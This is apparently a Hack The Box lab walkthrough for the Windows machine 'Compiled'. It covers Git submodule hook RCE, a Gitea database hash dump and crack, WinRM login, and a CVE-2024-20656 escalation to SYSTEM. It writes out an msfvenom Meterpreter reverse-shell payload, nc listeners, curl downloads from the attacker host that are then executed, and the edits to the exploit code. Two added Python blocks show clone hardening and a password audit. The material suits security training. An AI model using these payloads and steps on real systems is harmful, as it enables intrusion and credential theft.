Hack The Box / WINDOWS / 2026-03-27

Hack The Box — Compiled (Windows)

Abuse of insecure Git clone automation through submodule hook RCE for initial access, credential extraction from Gitea DB, WinRM access as emily, and local privilege escalation via CVE-2024-20656 to SYSTEM.

Target

  • IP: 10.10.11.26

Recon

sudo nmap -sC -sV 10.10.11.26 -p- -v -T5
PORT     STATE SERVICE    VERSION
3000/tcp open  ppp?
| fingerprint-strings:
|   GenericLines, Help, RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Content-Type: text/plain; charset=utf-8
|     Connection: close
|     Request
|   GetRequest:
|     HTTP/1.0 200 OK
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Content-Type: text/html; charset=utf-8
|     Set-Cookie: i_like_gitea=177515abfaf0de3f; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=qenIW3fQkFJkgDT1XMewDvE8jOQ6MTcyMjg1MTAwNjY5MzkzODAwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Aug 2024 09:43:26 GMT
|     <!DOCTYPE html>
|     <html lang="en-US" class="theme-arc-green">
|     <head>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <title>Git</title>
|   HTTPOptions:
|     HTTP/1.0 405 Method Not Allowed
|     Allow: HEAD
|     Allow: GET
|     Cache-Control: max-age=0, private, must-revalidate, no-transform
|     Set-Cookie: i_like_gitea=fbcbe26548be890b; Path=/; HttpOnly; SameSite=Lax
|     Set-Cookie: _csrf=PTS3uY6wZblo_aYfEjYctFnIeBQ6MTcyMjg1MTAxMzE1MjY0NDIwMA; Path=/; Max-Age=86400; HttpOnly; SameSite=Lax
|     X-Frame-Options: SAMEORIGIN
|     Date: Mon, 05 Aug 2024 09:43:33 GMT
|_    Content-Length: 0
5000/tcp open  upnp?
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.0.3 Python/3.12.3
|     Date: Mon, 05 Aug 2024 09:43:27 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 5234
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     <meta name="viewport" content="width=device-width, initial-scale=1.0">
|     <title>Compiled - Code Compiling Services</title>
|   RTSPRequest:
|     <!DOCTYPE HTML>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: 400 - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  pando-pub?

Initial analysis

Go to http://10.10.11.26:3000/. It is a Gitea instance. Browse Explore; there are multiple repositories. Download the Compiled repository: it is a Python web app.

There is an index endpoint where a POST can submit a Git repository URL. The server appends a line to:

  • C:\Users\Richard\source\repos\repos.txt

Likely another process reads this file, clones repos, then compiles projects.
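As an added illustration of the weak spot just described (this is not the Compiled app's code, and the helper names, the allow-listed host and the empty hooks directory are all assumptions), the following shows how the submission endpoint and the clone worker could be hardened: the URL is validated before it is appended to the queue, and the clone is run with submodule recursion, hooks and symlinks disabled. Note that an allow-list alone would not have stopped the attack in this write-up, because the malicious repositories are pushed to the internal Gitea itself; the clone flags are the part that removes the preconditions for the submodule hook RCE.

```python
# Added example, not part of the write-up or the Compiled project.
# Two pieces: validation of a submitted repository URL, and an argument
# vector for a hardened "git clone" that a build worker would run.
from urllib.parse import urlsplit

# Assumption: the build service may only clone from the internal Gitea.
ALLOWED_HOSTS = {"10.10.11.26:3000"}


def is_allowed_repo_url(url: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """True only for an http(s) URL on an allow-listed host whose path is a
    plain '<owner>/<repo>.git' with no credentials, query or traversal."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme not in ("http", "https"):
        return False
    if parts.username or parts.password:      # no embedded credentials
        return False
    if parts.netloc not in allowed_hosts:     # e.g. an attacker-controlled host
        return False
    if parts.query or parts.fragment:
        return False
    segments = parts.path.strip("/").split("/")
    if len(segments) != 2 or not segments[1].endswith(".git"):
        return False
    for seg in segments:                      # owner and repo: [A-Za-z0-9._-], no '..'
        if seg in ("", ".", "..") or not all(c.isalnum() or c in "._-" for c in seg):
            return False
    return True


def build_clone_command(url: str, dest: str, empty_hooks_dir: str) -> list:
    """Argument vector for a hardened clone. empty_hooks_dir is an existing,
    empty directory owned by the service (assumed), so hooks shipped in the
    fetched repository can never be picked up."""
    return [
        "git",
        "-c", f"core.hooksPath={empty_hooks_dir}",  # repository hooks never run
        "-c", "core.symlinks=false",                # no symlinks into .git/ on checkout
        "clone",
        "--no-recurse-submodules",                  # submodules are never initialised
        "--", url, dest,
    ]


if __name__ == "__main__":
    for candidate in ("http://10.10.11.26:3000/test12/captain.git",
                      "http://10.10.14.84/test.git"):
        print(candidate, "->", "queued" if is_allowed_repo_url(candidate) else "rejected")
    print(" ".join(build_clone_command("http://10.10.11.26:3000/test12/captain.git",
                                       r"C:\build\captain", r"C:\build\empty-hooks")))
```

The worker would still need to build the checked-out project in a sandbox, but with these flags the clone step itself no longer executes anything from the fetched repository.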

Proving Git callback

Start listener:

nc -vlnp 80

Go to http://10.10.11.26:5000/ and submit:

  • http://10.10.14.84/test.git

We receive:

GET /test.git/info/refs?service=git-upload-pack HTTP/1.1
Host: 10.10.14.84
User-Agent: git/2.45.0.windows.1
Accept: */*
Accept-Encoding: deflate, gzip, br, zstd
Pragma: no-cache
Git-Protocol: version=2

Exploitation via malicious Git setup

Relevant vulnerability:

  • https://amalmurali.me/posts/git-rce/

Copy final exploit script. Remove the final git clone call. Run script. Two repositories are created:

  • captain
  • hook

Modify captain/.gitmodules as shown in the blog, for example:

url = http://10.10.11.26:3000/test12/hook.git

Add file and commit. On Gitea, create repositories captain and hook. Push local repositories there.

Start listener:

nc -vlnp 4444

Go to http://10.10.11.26:5000/ and submit:

  • http://10.10.11.26:3000/test12/captain.git

Wait. We receive a reverse shell.

whoami
Richard

Gitea DB extraction

cd '\Program Files\Gitea'

There is gitea.db.

Get Meterpreter shell:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.41 LPORT=4444 -f exe -o reverse.exe
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set LHOST tun0
run

Upload and run reverse.exe on target. Download gitea.db.

sqlite3 gitea.db
select * from user;
1|administrator|administrator||administrator@compiled.htb|0|enabled|1bf0a9561cf076c5fc0d76e140788a91b5281609c384791839fd6e9996d3bbf5c91b8eee6bd5081e42085ed0be779c2ef86d|pbkdf2$50000$50|0|0|0||0|||6e1a6f3adbe7eab92978627431fd2984|a45c43d36dce3076158b19c2c696ef7b|en-US||1716401383|1716669640|1716669640|0|-1|1|1|0|0|0|1|0||administrator@compiled.htb|0|0|0|0|0|0|0|0|0||arc-green|0
2|richard|richard||richard@compiled.htb|0|enabled|4b4b53766fe946e7e291b106fcd6f4962934116ec9ac78a99b3bf6b06cf8568aaedd267ec02b39aeb244d83fb8b89c243b5e|pbkdf2$50000$50|0|0|0||0|||2be54ff86f147c6cb9b55c8061d82d03|d7cf2c96277dd16d95ed5c33bb524b62|en-US||1716401466|1720089561|1720089548|0|-1|1|0|0|0|0|1|0||richard@compiled.htb|0|0|0|0|2|0|0|0|0||arc-green|0
4|emily|emily||emily@compiled.htb|0|enabled|97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16|pbkdf2$50000$50|1|0|0||0|||0056552f6f2df0015762a4419b0748de|227d873cca89103cd83a976bdac52486|||1716565398|1716567763|0|0|-1|1|0|0|0|0|1|0||emily@compiled.htb|0|0|0|0|0|0|0|2|0||arc-green|0
6|test12|test12||test12@test.com|0|enabled|e0e24eb28f0736fcb28728474c4b7ddf148a25ed38689eb22435cc7bb9d3f733643db5c3ef3cdab3c6883faced4db0d09030|pbkdf2$50000$50|0|0|0||0|||77aaffcc5f0da7d97efff4bb3b52427a|776d869683337a8969357c4397c12db4|it-IT||1723819262|1723819274|1723819262|0|-1|1|0|0|0|0|1|0||test12@test.com|0|0|0|0|2|0|0|0|0||arc-green|0
PRAGMA table_info(user);

We notice:

7|passwd|TEXT|1||0
8|passwd_hash_algo|TEXT|1|'argon2'|0
17|salt|TEXT|0||0

Convert hash and salt:

perl -e 'print pack ("H*", "97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16")' | base64
l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
import base64
base64.b64encode(bytes.fromhex('227d873cca89103cd83a976bdac52486'))
In2HPMqJEDzYOpdr2sUkhg==

Final hash format:

sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=
hashcat -a 0 -m 10900 ./hash ./rockyou.txt
sha256:50000:In2HPMqJEDzYOpdr2sUkhg==:l5BygNwk/lF8Q0db0hi/rVbCXU0RA32LbaRA79TWka3+rUAzCyqmqvHzNiHQ1zIo/BY=:12345678
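The conversion above, gathered into one place as an added example (not part of the write-up): it rebuilds the hashcat line from the emily row and then checks a candidate password against the Gitea record directly, which is how an administrator would audit stored credentials for weak passwords without a cracking tool. It assumes that Gitea's "pbkdf2$<iter>$<keylen>" algorithm string means PBKDF2-HMAC-SHA256 with the hex salt decoded to raw bytes before use, which is the interpretation the cracked hashcat line confirms; the record dictionary is constructed from the row shown above (columns passwd, passwd_hash_algo and salt, cids 7, 8 and 17 in the PRAGMA output).

```python
# Added example, not part of the write-up. Converts a Gitea pbkdf2 user record
# to the hashcat -m 10900 format and verifies a candidate password against it.
import base64
import hashlib
import hmac

# Constructed from the emily row in the gitea.db dump above.
EMILY_RECORD = {
    "passwd": "97907280dc24fe517c43475bd218bfad56c25d4d11037d8b6da440efd4d691adfead40330b2aa6aaf1f33621d0d73228fc16",
    "passwd_hash_algo": "pbkdf2$50000$50",
    "salt": "227d873cca89103cd83a976bdac52486",
}


def parse_algo(algo: str):
    """'pbkdf2$50000$50' -> (iterations, derived key length in bytes)."""
    name, iters, keylen = algo.split("$")
    if name != "pbkdf2":
        raise ValueError(f"unsupported password hash algorithm: {name}")
    return int(iters), int(keylen)


def to_hashcat_10900(record: dict) -> str:
    """Build the 'sha256:<iter>:<b64 salt>:<b64 hash>' line used with -m 10900.
    Both the salt and the hash are stored hex-encoded in gitea.db and must be
    decoded to raw bytes before base64 encoding."""
    iters, _ = parse_algo(record["passwd_hash_algo"])
    salt_b64 = base64.b64encode(bytes.fromhex(record["salt"])).decode()
    hash_b64 = base64.b64encode(bytes.fromhex(record["passwd"])).decode()
    return f"sha256:{iters}:{salt_b64}:{hash_b64}"


def verify_password(record: dict, candidate: str) -> bool:
    """Recompute PBKDF2-HMAC-SHA256 (assumed Gitea semantics) for the candidate
    and compare it to the stored hash in constant time."""
    iters, keylen = parse_algo(record["passwd_hash_algo"])
    derived = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(record["salt"]), iters, dklen=keylen
    )
    return hmac.compare_digest(derived, bytes.fromhex(record["passwd"]))


if __name__ == "__main__":
    print(to_hashcat_10900(EMILY_RECORD))
    # A short audit list of obviously weak candidates (constructed).
    for pw in ("password", "emily", "12345678"):
        print(f"{pw!r}: {'MATCH' if verify_password(EMILY_RECORD, pw) else 'no'}")
```

Because the stored salt and hash are hex strings, forgetting the hex decode (feeding the ASCII text to base64 or to PBKDF2) produces a line hashcat accepts but will never crack; the verify function catches that mistake immediately because the known password stops matching.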

WinRM and privilege escalation

evil-winrm -i 10.10.11.26 -u 'emily' -p '12345678'
ls 'C:\Program Files (x86)'

We notice Microsoft Visual Studio 2019.

Exploit reference:

  • https://github.com/Wh04m1001/CVE-2024-20656.git

Clone repository and open solution in Visual Studio. Modify line 4 in main.cpp to:

WCHAR cmd[] = L"C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe";

Modify line 187 to:

CopyFile(L"c:\\temp\\reverse.exe", L"C:\\ProgramData\\Microsoft\\VisualStudio\\SetupWMI\\MofCompiler.exe", FALSE);

Build in Release mode. You get Expl.exe.

Start handler in msfconsole.

On target:

cd \
mkdir temp
cd temp
curl http://10.10.14.41/reverse.exe -o reverse.exe
curl http://10.10.14.41/Expl.exe -o Expl.exe
.\Expl.exe

We receive a Meterpreter session as SYSTEM.